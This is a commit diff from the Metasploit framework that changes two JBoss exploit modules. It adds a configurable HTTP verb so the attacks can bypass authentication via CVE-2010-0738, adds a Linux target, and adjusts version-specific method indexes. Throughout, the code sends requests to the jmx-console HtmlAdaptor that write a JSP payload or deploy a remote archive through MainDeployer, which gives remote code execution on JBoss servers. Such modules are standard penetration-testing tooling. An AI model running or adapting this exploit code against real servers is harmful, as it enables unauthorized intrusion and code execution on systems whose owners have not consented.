add VERB option to enable exploiting cve-2010-0738
git-svn-id: file:///home/svn/framework3/trunk@9282 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
c0494dcbc0
commit
7f758d5a02
|
@ -32,6 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2006-5750' ],
|
||||
[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
|
||||
[ 'OSVDB', '30767'],
|
||||
[ 'BID', '21219' ]
|
||||
],
|
||||
|
@ -57,7 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Opt::RPORT(8080),
|
||||
OptString.new('SHELL', [ true, "The system shell to use.", '/bin/sh']),
|
||||
OptString.new('URI', [ true, "The URI to call the payload.", '/web-console/']),
|
||||
OptString.new('PATH', [ true, "The URI to deploy the payload.", 'console-mgr.sar/web-console.war/'])
|
||||
OptString.new('PATH', [ true, "The URI to deploy the payload.", 'console-mgr.sar/web-console.war/']),
|
||||
OptString.new('VERB', [ true, "The HTTP verb to use", "POST"]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -68,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => '/jmx-console/HtmlAdaptor',
|
||||
'method' => 'POST',
|
||||
'method' => datastore['VERB'],
|
||||
'data' => 'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' +
|
||||
Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' +
|
||||
Rex::Text.uri_encode(payload.encoded) + '&arg4=True',
|
||||
|
|
|
@ -34,11 +34,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2007-1036' ],
|
||||
[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
|
||||
[ 'OSVDB', '33744' ],
|
||||
[ 'URL', 'http://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf' ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Platform' => [ 'win' ], # linux untested
|
||||
'Platform' => [ 'win', 'linux' ], # linux untested
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'Targets' =>
|
||||
[
|
||||
|
@ -55,6 +56,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Arch' => ARCH_X86,
|
||||
'Platform' => 'win'
|
||||
},
|
||||
],
|
||||
[ 'Linux Universal',
|
||||
{
|
||||
'Arch' => ARCH_X86,
|
||||
'Platform' => 'linux'
|
||||
},
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0))
|
||||
|
@ -64,7 +71,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Opt::RPORT(8080),
|
||||
OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
|
||||
OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
|
||||
OptString.new('PATH', [ true, "The URI path of the console", '/jmx-console'])
|
||||
OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console']),
|
||||
OptString.new('VERB', [ true, 'The HTTP verb to use', 'POST']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -140,15 +148,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Path' => resource_uri
|
||||
}})
|
||||
|
||||
print_status("Making the request to the MainDeployer...")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'method' => datastore['VERB'],
|
||||
'uri' => datastore['PATH'] + '/HtmlAdaptor',
|
||||
'vars_post' =>
|
||||
{
|
||||
'action' => 'invokeOp',
|
||||
'name' => 'jboss.system:service=MainDeployer',
|
||||
'methodIndex' => '21', # deploy via java.net.URL
|
||||
# deploy via java.net.URL
|
||||
'methodIndex' => '3', # jboss 4.0.5
|
||||
#'methodIndex' => '21', # jboss 3.0.8
|
||||
#'methodIndex' => '23', # jboss 3.2.7
|
||||
'arg0' => service_url
|
||||
}
|
||||
}, 20)
|
||||
|
@ -199,7 +211,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#
|
||||
print_status("Undeploying #{app_base} ...")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'method' => datastore['VERB'],
|
||||
'uri' => datastore['PATH'] + '/HtmlAdaptor',
|
||||
'vars_post' =>
|
||||
{
|
||||
|
|
Loading…
Reference in New Issue